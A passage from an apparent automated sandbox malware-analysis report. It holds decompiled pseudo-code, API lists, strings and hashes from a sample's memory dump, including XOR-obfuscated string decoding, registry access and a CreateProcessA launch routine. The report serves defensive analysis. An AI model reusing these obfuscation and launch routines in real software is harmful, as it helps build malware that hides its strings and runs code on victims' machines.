					 *(_t134 + _t108 + 0x98) =  *(_t134 + _t108 + 0x98) ^ _t24;
					_t108 = _t108 + 1;
				} while (_t108 < 0x65);
				_t109 =  &_v156;
				_v55 = 0;
				_t115 = _t129 - _t109;
				do {
					_t74 =  *_t109;
					 *((char*)(_t115 + _t109)) = _t74;
					_t109 = _t109 + 1;
				} while (_t74 != 0);
				_t92 = 0x62;
				_v291 = 0;
				_v291 = 0;
				_v292 = _t92 ^ 0x00000040;
				lstrcatA(_t129,  &_v292);
				lstrcatA(_t129, _v284);
				_v291 = 0;
				_v292 = _t92 ^ 0x00000040;
				_v291 = 0;
				lstrcatA(_t129,  &_v292);
				_t123 = 0x44;
				E00B4D0F0(_t123,  &_v260, 0, _t123);
				_v260.cb = _t123;
				_v260.lpDesktop = 0xb699c0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA(_v280, _t129, 0, 0, 0, 0, 0, 0,  &_v260,  &_v276);
				return E00B4AE43(_v48 ^ _t134 + 0x0000000c);
			}

APIs

Part of subcall function 00B42861: RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00B428DC

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,00000000,00000000,770BE3A0,?,?), ref: 00B44ADE
lstrcatA.KERNEL32(00000000,?), ref: 00B44B2F
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,00000000), ref: 00B44B52
lstrcatA.KERNEL32(00000000,?,?), ref: 00B44B9B
lstrcatA.KERNEL32(00000000,?), ref: 00B44C6F
lstrcatA.KERNEL32(00000000,?), ref: 00B44C76
lstrcatA.KERNEL32(00000000,?), ref: 00B44C90
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00B44CCF

Strings

Tett, xrefs: 00B44CAB
#4 s, xrefs: 00B44AEE

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcat$FolderPath$CreateOpenProcess
String ID: #4 s$Tett
API String ID: 2997047404-1022402705
Opcode ID: 6665f90c7b88a624cf1f39e8d0001b244819019737de5937fa8fa293886a719c
Instruction ID: d1f55ea46edd5c9a5dda0e3237a857593302cf42e04cb5f42ebc628ea5c371be
Opcode Fuzzy Hash: 6665f90c7b88a624cf1f39e8d0001b244819019737de5937fa8fa293886a719c
Instruction Fuzzy Hash: 906105614083859EE321DF38DC41BAFFBE8EF99308F00495DF9D897162EB7195898762

Uniqueness

Uniqueness Score: -1.00%

Function 00B5AADF, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00B5AADF(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t64;
				signed int _t67;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t76;
				signed int* _t78;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t91;
				signed int _t97;
				intOrPtr* _t98;
				signed int _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				intOrPtr* _t120;
				signed int _t121;
				void* _t122;
				void* _t126;
				signed int _t130;
				signed int _t138;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t146;
				signed int _t149;
				signed int _t150;
				void* _t153;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t162;

				_t110 = __ebx;
				_t153 = _t157;
				_t158 = _t157 - 0x10;
				_t146 = _a4;
				if(_t146 != 0) {
					_push(__ebx);
					_t141 = _t146;
					_t59 = E00B4CCD0(_t146, 0x3d);
					_v20 = _t59;
					__eflags = _t59;
					if(_t59 == 0) {
						L38:
						 *((intOrPtr*)(E00B55BBD())) = 0x16;
						goto L39;
					} else {
						__eflags = _t59 - _t146;
						if(_t59 == _t146) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t59 + 1));
							L60();
							_t110 = 0;
							__eflags =  *0xb6a510 - _t110; // 0x7c3e78
							if(__eflags != 0) {
								L14:
								_t64 =  *0xb6a510; // 0x7c3e78
								_v12 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L39;
								} else {
									_t67 = E00B5ADEB(_t146, _v20 - _t146);
									_v16 = _t67;
									_t120 = _v12;
									__eflags = _t67;
									if(_t67 < 0) {
										L24:
										__eflags = _v5 - _t110;
										if(_v5 == _t110) {
											goto L40;
										} else {
											_t68 =  ~_t67;
											_v16 = _t68;
											_t30 = _t68 + 2; // 0x2
											_t139 = _t30;
											__eflags = _t139 - _t68;
											if(_t139 < _t68) {
												goto L39;
											} else {
												__eflags = _t139 - 0x3fffffff;
												if(_t139 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E00B5DE67(_t120, _t139, 4);
													E00B564B8(_t110);
													_t71 = _v12;
													_t158 = _t158 + 0x10;
													__eflags = _t71;
													if(_t71 == 0) {
														goto L39;
													} else {
														_t121 = _v16;
														_t141 = _t110;
														 *(_t71 + _t121 * 4) = _t146;
														 *(_t71 + 4 + _t121 * 4) = _t110;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t120 - _t110;
										if( *_t120 == _t110) {
											goto L24;
										} else {
											E00B564B8( *((intOrPtr*)(_t120 + _t67 * 4)));
											_t138 = _v16;
											__eflags = _v5 - _t110;
											if(_v5 != _t110) {
												_t141 = _t110;
												 *(_v12 + _t138 * 4) = _t146;
											} else {
												_t139 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t139 + _t138 * 4)) - _t110;
													if( *((intOrPtr*)(_t139 + _t138 * 4)) == _t110) {
														break;
													}
													 *((intOrPtr*)(_t139 + _t138 * 4)) =  *((intOrPtr*)(_t139 + 4 + _t138 * 4));
													_t138 = _t138 + 1;
													__eflags = _t138;
												}
												_v16 = E00B5DE67(_t139, _t138, 4);
												E00B564B8(_t110);
												_t71 = _v16;
												_t158 = _t158 + 0x10;
												__eflags = _t71;
												if(_t71 != 0) {
													L29:
													 *0xb6a510 = _t71;
												}
											}
											__eflags = _a8 - _t110;
											if(_a8 == _t110) {
												goto L40;
											} else {
												_t122 = _t146 + 1;
												do {
													_t72 =  *_t146;
													_t146 = _t146 + 1;
													__eflags = _t72;
												} while (_t72 != 0);
												_v16 = _t146 - _t122 + 2;
												_t149 = E00B598AF(_t146 - _t122 + 2, 1);
												_pop(_t124);
												__eflags = _t149;
												if(_t149 == 0) {
													L37:
													E00B564B8(_t149);
													goto L40;
												} else {
													_t76 = E00B56383(_t149, _v16, _a4);
													_t160 = _t158 + 0xc;
													__eflags = _t76;
													if(__eflags != 0) {
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														E00B52919();
														asm("int3");
														_push(_t153);
														_push(_t141);
														_t143 = _v48;
														__eflags = _t143;
														if(_t143 != 0) {
															_t126 = 0;
															_t78 = _t143;
															__eflags =  *_t143;
															if( *_t143 != 0) {
																do {
																	_t78 =  &(_t78[1]);
																	_t126 = _t126 + 1;
																	__eflags =  *_t78;
																} while ( *_t78 != 0);
															}
															_t51 = _t126 + 1; // 0x2
															_t150 = E00B598AF(_t51, 4);
															_t128 = _t149;
															__eflags = _t150;
															if(_t150 == 0) {
																L58:
																E00B55E69(_t110, _t128, _t139, _t143, _t150);
																goto L59;
															} else {
																_t130 =  *_t143;
																__eflags = _t130;
																if(_t130 == 0) {
																	L57:
																	E00B564B8(0);
																	_t86 = _t150;
																	goto L45;
																} else {
																	_push(_t110);
																	_t110 = _t150 - _t143;
																	__eflags = _t110;
																	do {
																		_t52 = _t130 + 1; // 0x5
																		_t139 = _t52;
																		do {
																			_t87 =  *_t130;
																			_t130 = _t130 + 1;
																			__eflags = _t87;
																		} while (_t87 != 0);
																		_t53 = _t130 - _t139 + 1; // 0x6
																		_v12 = _t53;
																		 *(_t110 + _t143) = E00B598AF(_t53, 1);
																		E00B564B8(0);
																		_t162 = _t160 + 0xc;
																		__eflags =  *(_t110 + _t143);
																		if( *(_t110 + _t143) == 0) {
																			goto L58;
																		} else {
																			_t91 = E00B56383( *(_t110 + _t143), _v12,  *_t143);
																			_t160 = _t162 + 0xc;
																			__eflags = _t91;
																			if(_t91 != 0) {
																				L59:
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				E00B52919();
																				asm("int3");
																				_t84 =  *0xb6a510; // 0x7c3e78
																				__eflags = _t84 -  *0xb6a51c;
																				if(_t84 ==  *0xb6a51c) {
																					_push(_t84);
																					L43();
																					 *0xb6a510 = _t84;
																					return _t84;
																				}
																				return _t84;
																			} else {
																				goto L55;
																			}
																		}
																		goto L63;
																		L55:
																		_t143 = _t143 + 4;
																		_t130 =  *_t143;
																		__eflags = _t130;
																	} while (_t130 != 0);
																	goto L57;
																}
															}
														} else {
															_t86 = 0;
															__eflags = 0;
															L45:
															return _t86;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t149 - _a4 - 1) = _t110;
														_t97 = E00B63695(_v20 + 1 + _t149 - _a4, __eflags, _t149,  ~_v5 & _v20 + 0x00000001 + _t149 - _a4);
														__eflags = _t97;
														if(_t97 == 0) {
															_t98 = E00B55BBD();
															_t111 = _t110 | 0xffffffff;
															__eflags = _t111;
															 *_t98 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t110;
									if(_v5 != _t110) {
										 *0xb6a510 = E00B598AF(1, 4);
										E00B564B8(_t110);
										_t158 = _t158 + 0xc;
										__eflags =  *0xb6a510 - _t110; // 0x7c3e78
										if(__eflags == 0) {
											L39:
											_t111 = _t110 | 0xffffffff;
											__eflags = _t111;
											goto L40;
										} else {
											__eflags =  *0xb6a514 - _t110; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0xb6a514 = E00B598AF(1, 4);
												E00B564B8(_t110);
												_t158 = _t158 + 0xc;
												__eflags =  *0xb6a514 - _t110; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t111 = 0;
										L40:
										E00B564B8(_t141);
										_t62 = _t111;
										goto L41;
									}
								} else {
									__eflags =  *0xb6a514 - _t110; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										_t108 = L00B5369A();
										__eflags = _t108;
										if(_t108 == 0) {
											goto L38;
										} else {
											L60();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t109 = E00B55BBD();
					 *_t109 = 0x16;
					_t62 = _t109 | 0xffffffff;
					L41:
					return _t62;
				}
				L63:
			}

APIs

___from_strstr_to_strchr.LIBCMT ref: 00B5AB09
_free.LIBCMT ref: 00B5ABE2
_free.LIBCMT ref: 00B5AC0F

Strings

x>|, xrefs: 00B5AB30, 00B5AB6F, 00B5AB7C, 00B5ABB3, 00B5AC7B

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$___from_strstr_to_strchr
String ID: x>|
API String ID: 3409252457-3184903824
Opcode ID: e78a7fa0db5d9ab2defb6f04704be7cd9e5040b1d2e0ee873d58c66666f835c3
Instruction ID: 438e1aa90e054fcc1ec18ef4f15051fe66a879b23fe359227429f6854b3db3a6
Opcode Fuzzy Hash: e78a7fa0db5d9ab2defb6f04704be7cd9e5040b1d2e0ee873d58c66666f835c3
Instruction Fuzzy Hash: 4151B671904205AFDF21AF64DC91B6D7BF4EF01316F1443EAEE11B72C1EA758A488B92

Uniqueness

Uniqueness Score: -1.00%

Function 00B581F3, Relevance: 15.1, APIs: 10, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00B581F3(void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;

				_t71 = __esi;
				_t36 = _a4;
				_t67 =  *_a4;
				_t75 = _t67 - 0xb34c38;
				if(_t67 != 0xb34c38) {
					E00B564B8(_t67);
					_t36 = _a4;
				}
				E00B564B8( *((intOrPtr*)(_t36 + 0x3c)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x30)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x34)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x38)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x28)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x2c)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x40)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x44)));
				E00B564B8( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E00B5803B(_t75);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E00B5809C(_t71, _t75);
			}

APIs

_free.LIBCMT ref: 00B58209

Part of subcall function 00B564B8: RtlFreeHeap.NTDLL(00000000,00000000,?,00B5B9CA,?,00000000,?,?,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?), ref: 00B564CE
Part of subcall function 00B564B8: GetLastError.KERNEL32(?,?,00B5B9CA,?,00000000,?,?,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?,?), ref: 00B564E0

_free.LIBCMT ref: 00B58215
_free.LIBCMT ref: 00B58220
_free.LIBCMT ref: 00B5822B
_free.LIBCMT ref: 00B58236
_free.LIBCMT ref: 00B58241
_free.LIBCMT ref: 00B5824C
_free.LIBCMT ref: 00B58257
_free.LIBCMT ref: 00B58262
_free.LIBCMT ref: 00B58270

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: da8e59364a2cc3e4b6d9b0ee9c133c6914fb80dda7fca0606d71510f4a177587
Instruction ID: 301c289f1edfd37ecffe80376c257fc399740b68c4e2f19962dc498e4ae1af58
Opcode Fuzzy Hash: da8e59364a2cc3e4b6d9b0ee9c133c6914fb80dda7fca0606d71510f4a177587
Instruction Fuzzy Hash: 30218976900108AFCF41EF94C841DDD7BF9EF08351F8145E5BA15AB221DB35DA588B90

Uniqueness

Uniqueness Score: -1.00%

Function 00B63CF6, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 148COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00B60306), ref: 00B63D0F

Strings

log, xrefs: 00B63D6C, 00B63D7B
acos, xrefs: 00B63E45
exp, xrefs: 00B63D8E, 00B63DF3
pow, xrefs: 00B63DAD, 00B63E57, 00B63EA4
asin, xrefs: 00B63E3C
log10, xrefs: 00B63D51, 00B63D60
sqrt, xrefs: 00B63E4E

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 0e044e5675206802bb2b54a347d1888f98c9ff06852128dee6cbc277cf5d2c0a
Instruction ID: 4e179611c378abf2f7ef6a740d44791ba04d2ba7f12838b3d8e032bbebb1490c
Opcode Fuzzy Hash: 0e044e5675206802bb2b54a347d1888f98c9ff06852128dee6cbc277cf5d2c0a
Instruction Fuzzy Hash: B1517A7190850ACBCF209F59D98C1ADBBF0FF45B14F2040D5D891A7258CB7A8A25DB75

Uniqueness

Uniqueness Score: -1.00%

Function 00B42B76, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116
registryCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00B42B76(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				char _v16;
				char _v17;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v40;
				void* _v44;
				signed int _v48;
				signed int _t39;
				char* _t41;
				char _t44;
				void* _t46;
				long _t48;
				void* _t52;
				void _t53;
				void _t54;
				char* _t63;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				signed int _t70;
				void* _t79;
				void* _t80;
				signed int _t81;
				intOrPtr _t83;
				void* _t84;
				void* _t90;
				signed int _t91;

				_t39 =  *0xb69014; // 0xce6f0fb5
				_v12 = _t39 ^ _t91;
				_t83 = _a4;
				_push(0x208);
				_t41 = E00B509A2();
				asm("movaps xmm0, [0xb3dba0]");
				_t63 = _t41;
				asm("movups [ebp-0x24], xmm0");
				_v24 = 0x2426373f;
				_t65 = 0;
				_v20 = 0x332735;
				do {
					_t5 = _t65 + 0x40; // 0x40
					 *(_t91 + _t65 - 0x24) =  *(_t91 + _t65 - 0x24) ^ _t5;
					_t65 = _t65 + 1;
				} while (_t65 < 0x17);
				_t66 =  &_v40;
				_v17 = 0;
				_t79 = _t63 - _t66;
				do {
					_t44 =  *_t66;
					 *((char*)(_t66 + _t79)) = _t44;
					_t66 = _t66 + 1;
				} while (_t44 != 0);
				_v48 = _v48 & 0x00000000;
				_t46 = GetCurrentProcess();
				__imp__IsWow64Process(_t46,  &_v48);
				if(_t46 == 0 || _v48 == 0) {
					_t48 = RegOpenKeyA(0x80000001, _t63,  &_v44);
				} else {
					_t48 = RegOpenKeyExA(0x80000001, _t63, 0, 0x101,  &_v44);
				}
				if(_t48 == 0) {
					asm("movaps xmm0, [0xb3ddd0]");
					_t67 = 0;
					asm("movups [ebp-0x24], xmm0");
					_v24 = 0x733e3d31;
					_v20 = 0x3f223404;
					_v16 = 0;
					do {
						_t22 = _t67 + 0x40; // 0x40
						 *(_t91 + _t67 - 0x24) =  *(_t91 + _t67 - 0x24) ^ _t22;
						_t67 = _t67 + 1;
					} while (_t67 < 0x18);
					_push(_t67);
					_v16 = 0;
					E00B42CCF(_t67, _v44,  &_v40, _t83);
					_v28 = 0x2d37202c;
					_v24 = 0x35232d27;
					_v20 = 0x2e322c66;
					_v16 = 0;
					_t52 = E00B42810( &_v28);
					_t80 = _t52;
					_t90 = _t52;
					do {
						_t53 =  *_t80;
						_t80 = _t80 + 1;
					} while (_t53 != 0);
					_t81 = _t80 - _t90;
					_t84 = _t83 - 1;
					do {
						_t54 =  *(_t84 + 1);
						_t84 = _t84 + 1;
					} while (_t54 != 0);
					_t70 = _t81 >> 2;
					memcpy(_t84, _t90, _t70 << 2);
					memcpy(_t90 + _t70 + _t70, _t90, _t81 & 0x00000003);
					RegCloseKey(_v44);
					E00B50985(_t63);
				} else {
				}
				return E00B4AE43(_v12 ^ _t91);
			}

APIs

GetCurrentProcess.KERNEL32(00000000), ref: 00B42BE0
IsWow64Process.KERNEL32(00000000), ref: 00B42BE7
RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000101,?), ref: 00B42C08
RegOpenKeyA.ADVAPI32(80000001,00000000,?), ref: 00B42C1A
RegCloseKey.ADVAPI32(?,?,?,?,00000001), ref: 00B42CB1

Strings

'-#5, xrefs: 00B42C73
f,2., xrefs: 00B42C7A
, 7-, xrefs: 00B42C6C

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: OpenProcess$CloseCurrentWow64
String ID: '-#5$, 7-$f,2.
API String ID: 3785737565-2631701596
Opcode ID: d637505c2ac05f7e3eb762360cfb579f454ab249cf1db8891a4c94759cbabf96
Instruction ID: ff540c6a9e4517263457a1eece7489957363b5e0b10d5d039dabd520ae5cf630
Opcode Fuzzy Hash: d637505c2ac05f7e3eb762360cfb579f454ab249cf1db8891a4c94759cbabf96
Instruction Fuzzy Hash: 3041FF709042489AEF05CFB8D8847FEBBF8EF59304F5041A8E541B6282DB754A45DB70

Uniqueness

Uniqueness Score: -1.00%

Function 00B5B78F, Relevance: 13.7, APIs: 9, Instructions: 201
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00B5B78F(char _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t59;
				signed int _t68;
				char _t81;
				intOrPtr* _t82;
				void* _t93;
				signed int _t96;
				char _t107;
				char _t108;
				char* _t113;
				signed int _t119;
				signed int* _t120;
				char _t122;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				char* _t129;

				_t122 = _a4;
				_v24 = _t122;
				_v20 = 0;
				if( *((intOrPtr*)(_t122 + 0xb0)) != 0 ||  *((intOrPtr*)(_t122 + 0xac)) != 0) {
					_v16 = 1;
					_t93 = E00B598AF(1, 0x50);
					if(_t93 != 0) {
						_t96 = 0x14;
						memcpy(_t93,  *(_t122 + 0x88), _t96 << 2);
						_t124 = E00B56F1C(4);
						_t119 = 0;
						_v8 = _t124;
						E00B564B8(0);
						if(_t124 != 0) {
							 *_t124 = 0;
							_t122 = _a4;
							if( *((intOrPtr*)(_t122 + 0xb0)) == 0) {
								_t52 =  *0xb690c0; // 0xb69114
								 *_t93 = _t52;
								_t53 =  *0xb690c4; // 0xb6a6b4
								 *((intOrPtr*)(_t93 + 4)) = _t53;
								_t54 =  *0xb690c8; // 0xb6a6b4
								 *((intOrPtr*)(_t93 + 8)) = _t54;
								_t55 =  *0xb690f0; // 0xb69118
								 *((intOrPtr*)(_t93 + 0x30)) = _t55;
								_t56 =  *0xb690f4; // 0xb6a6b8
								 *((intOrPtr*)(_t93 + 0x34)) = _t56;
								L19:
								 *_v8 = 1;
								if(_t119 != 0) {
									 *_t119 = 1;
								}
								goto L21;
							}
							_t120 = E00B56F1C(4);
							_v12 = _t120;
							E00B564B8(0);
							_push(_t93);
							if(_t120 != 0) {
								 *_t120 =  *_t120 & 0x00000000;
								_t121 =  *((intOrPtr*)(_t122 + 0xb0));
								_push(0xe);
								_push( *((intOrPtr*)(_t122 + 0xb0)));
								_push(1);
								_push( &_v24);
								_t68 = E00B5EDC5(_t93,  *((intOrPtr*)(_t122 + 0xb0)), _t122);
								_t16 = _t93 + 4; // 0x4
								_t125 = _t68;
								_t126 = _t125 | E00B5EDC5(_t93,  *((intOrPtr*)(_t122 + 0xb0)), _t125,  &_v24, 1, _t121, 0xf, _t16);
								_t18 = _t93 + 8; // 0x8
								_t127 = _t126 | E00B5EDC5(_t93, _t121, _t126,  &_v24, 1, _t121, 0x10, _t18);
								_t128 = _t127 | E00B5EDC5(_t93, _t121, _t127,  &_v24, 2, _t121, 0xe, _t93 + 0x30);
								_t22 = _t93 + 0x34; // 0x34
								if((E00B5EDC5(_t93, _t121, _t128,  &_v24, 2, _t121, 0xf, _t22) | _t128) == 0) {
									_t113 =  *((intOrPtr*)(_t93 + 8));
									while(1) {
										_t81 =  *_t113;
										if(_t81 == 0) {
											break;
										}
										_t30 = _t81 - 0x30; // -48
										_t107 = _t30;
										if(_t107 > 9) {
											if(_t81 != 0x3b) {
												L16:
												_t113 = _t113 + 1;
												continue;
											}
											_t129 = _t113;
											do {
												_t82 = _t129 + 1;
												_t108 =  *_t82;
												 *_t129 = _t108;
												_t129 = _t82;
											} while (_t108 != 0);
											continue;
										}
										 *_t113 = _t107;
										goto L16;
									}
									_t119 = _v12;
									_t122 = _a4;
									goto L19;
								}
								E00B5B726(_t93);
								E00B564B8(_t93);
								E00B564B8(_v12);
								_v16 = _v16 | 0xffffffff;
								L12:
								E00B564B8(_v8);
								return _v16;
							}
							E00B564B8();
							goto L12;
						}
						E00B564B8(_t93);
						return 1;
					}
					return 1;
				} else {
					_t119 = 0;
					_v8 = 0;
					_t93 = 0xb690c0;
					L21:
					_t59 =  *(_t122 + 0x80);
					if(_t59 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t122 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t59 | 0xffffffff) == 0) {
							E00B564B8( *((intOrPtr*)(_t122 + 0x7c)));
							E00B564B8( *(_t122 + 0x88));
						}
					}
					 *((intOrPtr*)(_t122 + 0x7c)) = _v8;
					 *(_t122 + 0x80) = _t119;
					 *(_t122 + 0x88) = _t93;
					return 0;
				}
			}

APIs

_free.LIBCMT ref: 00B5B7FD
_free.LIBCMT ref: 00B5B809
_free.LIBCMT ref: 00B5B932
_free.LIBCMT ref: 00B5B93D

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 382f639c6216f07b2b601013a915343acfdc1da084605e8cff91e93f170df07e
Instruction ID: 5d3f9a5e372a4c54f2b45defafbdb4e0662c16feddf28ad504d112d8715aec8d
Opcode Fuzzy Hash: 382f639c6216f07b2b601013a915343acfdc1da084605e8cff91e93f170df07e
Instruction Fuzzy Hash: ED61B3719007059FDB20DF64C881FAAB7F8EF44751F5441EAEE55AB281EB709D088B50

Uniqueness

Uniqueness Score: -1.00%

Function 00B54730, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 265
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00B54730(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int* _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int* _v724;
				intOrPtr _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t146;
				void* _t153;
				signed int _t156;
				signed int _t157;
				intOrPtr _t158;
				signed int _t161;
				signed int _t163;
				signed int _t164;
				intOrPtr _t166;
				signed int _t169;
				signed int _t170;
				signed int _t172;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t201;
				signed int _t204;
				void* _t209;
				intOrPtr* _t212;
				intOrPtr* _t213;
				signed int _t222;
				intOrPtr _t225;
				intOrPtr* _t226;
				signed int _t228;
				signed int* _t232;
				signed int _t233;
				void* _t238;
				void* _t240;
				signed int _t241;
				intOrPtr _t243;
				signed int _t249;
				signed int _t251;
				signed int _t254;
				signed int* _t255;
				intOrPtr* _t256;
				short _t257;
				signed int _t259;
				signed int _t261;
				void* _t263;
				void* _t265;

				_t259 = _t261;
				_t146 =  *0xb69014; // 0xce6f0fb5
				_v8 = _t146 ^ _t259;
				_push(__ebx);
				_t204 = _a8;
				_push(__esi);
				_push(__edi);
				_t243 = _a4;
				_v736 = _t204;
				_v724 = E00B5830D(_t209, _t238) + 0x278;
				_t153 = E00B53E03(_t204, _t243, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v712);
				_t263 = _t261 - 0x2e4 + 0x18;
				if(_t153 == 0) {
					L39:
					__eflags = 0;
					goto L40;
				} else {
					_t10 = _t204 + 2; // 0x6
					_t249 = _t10 << 4;
					_t156 =  &_v272;
					_v716 = _t249;
					_t212 =  *((intOrPtr*)(_t249 + _t243));
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t251 = _v716;
						if( *_t156 !=  *_t212) {
							break;
						}
						if( *_t156 == 0) {
							L6:
							_t157 = _v704;
						} else {
							_t257 =  *((intOrPtr*)(_t156 + 2));
							_v706 = _t257;
							_t251 = _v716;
							if(_t257 !=  *((intOrPtr*)(_t212 + 2))) {
								break;
							} else {
								_t156 = _t156 + 4;
